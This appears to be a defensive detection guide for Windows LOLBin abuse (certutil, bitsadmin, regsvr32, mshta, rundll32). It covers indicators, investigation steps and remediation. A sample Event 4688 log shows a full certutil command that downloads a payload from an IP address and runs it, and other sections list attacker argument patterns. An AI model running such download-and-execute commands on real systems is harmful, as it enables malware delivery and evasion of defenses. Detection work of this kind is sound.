EventPeeker
Analyze EVTX Logs Free →·Detection guides
Event ID 4688T1218high

Living-Off-the-Land Binary Abuse (LOLBins)

Living-off-the-land (LOLBin) attacks abuse legitimate Windows binaries — certutil, bitsadmin, regsvr32, mshta, and others — to download payloads, execute code, and evade detection. Because these binaries are signed by Microsoft and expected on every Windows system, traditional signature-based defenses often miss them entirely.

Severity

High

ATT&CK Tactic

Defense Evasion

Common attacker usage

Download payloads using certutil -urlcache or bitsadmin /transfer — both are signed Windows tools that proxy HTTP/S requests · Execute remote COM scriptlets via regsvr32 /s /i:http://... — bypasses AppLocker and older application whitelisting · Run HTML Applications (HTA) via mshta.exe to execute VBScript or JScript from a URL · Use rundll32 to execute arbitrary DLLs or JavaScript — commonly used to load Cobalt Strike stagers · Run malicious scripts via wscript.exe or cscript.exe from user-writable directories

Investigate immediately if

  • !certutil.exe or bitsadmin.exe appear with http:// or https:// in the command line
  • !regsvr32.exe is called with a URL argument (scrobj.dll or direct /i:http://...)
  • !mshta.exe launches with a URL or javascript: / vbscript: argument
  • !rundll32.exe is called with javascript: or an unusual DLL path
  • !wscript.exe or cscript.exe executes a .vbs or .js from AppData, Temp, or Downloads

MITRE ATT&CK

Technique

T1218 · System Binary Proxy Execution

Tactic

Defense Evasion

View on attack.mitre.org →

Security Relevance

LOLBin abuse is one of the most effective defense-evasion techniques in the modern threat landscape because it leaves no foreign executable on disk — just legitimate Windows binaries doing unexpected things. APT groups, ransomware operators, and commodity malware routinely use these techniques to bypass endpoint detection, application whitelisting, and perimeter controls. Detection requires command-line logging (Event ID 4688 with ProcessCreationIncludeCmdLine=1) — without it, these attacks are effectively invisible.

Indicators of Malicious Use

  • certutil.exe with -decode, -urlcache, -encode, or any http:// argument
  • bitsadmin.exe with /transfer, /create, /addfile, or /SetNotifyCmdLine
  • regsvr32.exe with /s /i:http (Squiblydoo technique) or scrobj.dll in arguments
  • mshta.exe with a URL, javascript:, or vbscript: argument
  • rundll32.exe calling javascript:, or loading DLLs from user-writable paths
  • wscript.exe or cscript.exe running scripts from AppData, Temp, Downloads, or Public
  • odbcconf.exe with /a {REGSVR ...} — proxy DLL registration
  • Any of the above spawned by Office applications, web browsers, or email clients

Example Log Entry

Log Name: Security
Event ID:  4688
Level:     Information

A new process has been created.

Creator Subject:
  Account Name:   CORP\jsmith
  Account Domain: CORP

Process Information:
  New Process ID:    0x1d4c
  New Process Name:  C:\Windows\System32\certutil.exe
  Creator Process:   C:\Windows\System32\cmd.exe

Process Command Line:
  certutil.exe -urlcache -split -f http://192.168.45.10/payload.exe C:\Users\Public\svc.exe

[Followed shortly by:]

Event ID:  4688
New Process Name:  C:\Users\Public\svc.exe
Creator Process:   C:\Windows\System32\cmd.exe

Investigation Steps

  1. 1.Verify command-line logging is enabled — Event 4688 only includes the command line if 'Process Creation' auditing is configured with ProcessCreationIncludeCmdLine=1 in Group Policy. Without this, detection is impossible.
  2. 2.Extract the full command line from Event 4688 and look for URLs, encoded payloads (base64 strings), or unusual file paths in arguments.
  3. 3.Identify the parent process — LOLBin abuse launched from Office, browsers, or email clients strongly indicates a phishing or drive-by initial access.
  4. 4.Check for dropped files — certutil and bitsadmin are commonly used to download payloads. Look for new executables in user-writable directories (AppData, Temp, Downloads, Public) created at the same timestamp.
  5. 5.Look for the subsequent execution — what did the downloaded or decoded file do? Check Event 4688 for new processes started by the LOLBin's parent or by the dropped payload.
  6. 6.Search for network connections at the same timestamp — bitsadmin and certutil make outbound HTTP/S requests. Proxy or firewall logs will show the destination IP and URL.
  7. 7.Check BITS jobs: Get-BitsTransfer -AllUsers — malicious BITS jobs may persist even after the initial command completes.

Check your own logs for this technique — upload an EVTX file for instant detection, no account required.

Upload EVTX →See sample

Common False Positives

  • IT administrators using certutil for certificate management — certutil's primary legitimate purpose is certificate operations. Legitimate use will target .cer, .crt, or .pfx files, not executables.
  • Software deployment tools using bitsadmin or BITS for downloads — WSUS, SCCM, and some patch management tools use BITS. Verify the source URL and destination path.
  • Security tools and EDR agents — some endpoint security products use signed Windows binaries for internal operations. Review the parent process and destination.
  • Developers using mshta for testing HTA applications — rare but possible in development environments. Check the HTA source and whether it contacts external URLs.

Remediation

  • Enable command-line auditing for Event 4688: Group Policy → Computer Configuration → Administrative Templates → System → Audit Process Creation → Include command line in process creation events.
  • Deploy Windows Defender Application Control (WDAC) or AppLocker rules that block certutil, bitsadmin, mshta, and regsvr32 from making network connections or running from user-writable paths.
  • Block outbound HTTP/S from certutil.exe, bitsadmin.exe, and mshta.exe at the perimeter firewall or web proxy — these binaries have no legitimate need to initiate external connections in most environments.
  • Enable Attack Surface Reduction (ASR) rules in Microsoft Defender: 'Block execution of potentially obfuscated scripts' and 'Block Office applications from creating executable content'.
  • Restrict script execution policy via Group Policy — prevent wscript.exe and cscript.exe from running .vbs and .js files from user-writable locations.
  • Deploy Sysmon with a rule set (e.g. SwiftOnSecurity config) — provides much richer process creation and network connection logging than native Windows auditing.

Related Event IDs

4688Process creation — LOLBin execution with command-line arguments
4689Process exit — pair with 4688 to understand execution duration
4663Object access — files written by the LOLBin to disk
4104PowerShell script block — scripts run after LOLBin delivery

Related Detection Guides

PowerShell AbuseDefender DisabledCredential DumpingLateral Movement

Analyze your Windows Event Logs

Upload an .evtx file from servers, domain controllers, or endpoints — get instant detections, MITRE mappings, and an AI-generated triage report.

Detect this technique in your logs →
← All detection guides·Analyze EVTX Logs Free →